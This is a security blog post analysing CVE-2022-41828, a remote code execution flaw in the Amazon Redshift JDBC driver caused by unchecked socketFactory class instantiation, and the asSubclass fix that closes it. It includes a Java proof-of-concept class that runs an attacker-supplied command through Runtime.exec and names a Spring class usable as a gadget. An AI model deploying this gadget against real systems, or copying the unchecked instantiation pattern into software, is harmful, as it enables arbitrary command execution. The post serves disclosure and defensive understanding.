CVE-2022-41828 Amazon Redshift JDBC Driver RCE
2022-10-28 12:48:08 Author: y4er.com

I came across this advisory and, after taking a look, found it is the same issue as the one in the PostgreSQL (pgsql) JDBC driver.

https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86

During connection initialization, com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory takes the socketFactoryArg and socketFactory class name from the connection properties and instantiates that class.

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/1.png

com.amazon.redshift.util.ObjectFactory#instantiate looks up a constructor that takes either a Properties parameter or a String parameter and calls newInstance on it, without checking what type the named class actually is.

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/2.png

A malicious class is used here (the String-argument constructor is the one the factory ends up calling):

```java
package org.example;

import java.io.IOException;

// Class with a (String) constructor, which is exactly the shape
// ObjectFactory#instantiate looks for; the argument comes from socketFactoryArg.
public class atao {

    public atao(String cmd) {
        try {
            // Executes the attacker-controlled argument as a command on construction
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
```

As with pgsql, Spring's ClassPathXmlApplicationContext (which also has a String constructor) can be used instead of a custom class.

Screenshot borrowed from jas502n (少宇):

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/3.png

The fix

https://github.com/aws/amazon-redshift-jdbc-driver/commit/9999659bbc9f3d006fb02a0bf39d5bcf3b503605

An extra parameter (the expected class) was added:

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/4.png

Here Class<? extends T> cls = Class.forName(classname).asSubclass(expectedClass); restricts the loaded class to the expected type, so arbitrary objects can no longer be instantiated.

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/5.png

The fix is the same as the one applied to pgsql.
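The two instantiation patterns side by side, as an added example that is not the driver's own code: a simplified version of the unchecked lookup described above, and the asSubclass() check the fix introduces. The real ObjectFactory differs in detail, and java.io.File stands in for an attacker-chosen class because it has a (String) constructor.

```java
import java.util.Properties;
import javax.net.SocketFactory;

public class SocketFactoryInstantiation {

    // Unchecked pattern, as the post describes the pre-fix driver: any class name
    // is loaded and a (String) or (Properties) constructor is invoked, with no
    // check that the result is actually a SocketFactory.
    static Object instantiateUnchecked(String className, String arg) throws Exception {
        Class<?> cls = Class.forName(className);
        try {
            return cls.getConstructor(String.class).newInstance(arg);
        } catch (NoSuchMethodException e) {
            Properties props = new Properties();
            props.setProperty("arg", arg);
            return cls.getConstructor(Properties.class).newInstance(props);
        }
    }

    // Checked pattern, the shape of the upstream fix: asSubclass() throws
    // ClassCastException for any class not assignable to the expected type,
    // so a constructor of a foreign class is never reached.
    static <T> T instantiateChecked(Class<T> expected, String className, String arg)
            throws Exception {
        Class<? extends T> cls = Class.forName(className).asSubclass(expected);
        try {
            return cls.getConstructor(String.class).newInstance(arg);
        } catch (NoSuchMethodException e) {
            Properties props = new Properties();
            props.setProperty("arg", arg);
            return cls.getConstructor(Properties.class).newInstance(props);
        }
    }

    public static void main(String[] args) throws Exception {
        // java.io.File is a harmless stand-in for an attacker-chosen class: it has
        // a (String) constructor, so the unchecked path builds it without complaint.
        Object o = instantiateUnchecked("java.io.File", "placeholder");
        System.out.println("unchecked built: " + o.getClass().getName());

        try {
            instantiateChecked(SocketFactory.class, "java.io.File", "placeholder");
            System.out.println("checked built a File (should not happen)");
        } catch (ClassCastException e) {
            System.out.println("checked rejected: " + e.getMessage());
        }
    }
}
```

Running it prints the File class name for the unchecked path and a ClassCastException message for the checked one; the constructor lookup for the foreign class is never even attempted.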

My writing is poor, my wording flippant, the content shallow and my technique clumsy. Corrections and pointers from more experienced readers are welcome; many thanks.

Source: https://y4er.com/posts/cve-2022-41828-amazon-redshift-jdbc-driver-rce/